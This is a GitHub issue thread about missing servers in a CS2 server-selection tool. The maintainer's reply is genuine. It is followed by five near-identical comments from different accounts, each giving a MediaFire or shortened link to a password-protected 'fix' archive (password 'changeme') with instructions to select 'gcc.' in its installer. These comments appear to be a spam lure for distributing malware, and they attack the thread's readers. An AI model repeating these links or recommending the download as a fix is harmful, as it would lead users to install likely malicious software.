### ISSUE TITLE
not all servers are listed

### ISSUE THREAD

**Issue by mountaincastle47** [ShivamNagar2002/CS2-Server-Select#1]

**Comment by ShivamNagar2002** [comment]
Hey , thanks for bringing this to my attention 
I have added most servers in the latest release 
https://github.com/ShivamNagar2002/CS2-Server-Select/releases/tag/release_1_5 

If you are still unable to find desired servers please let me know

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
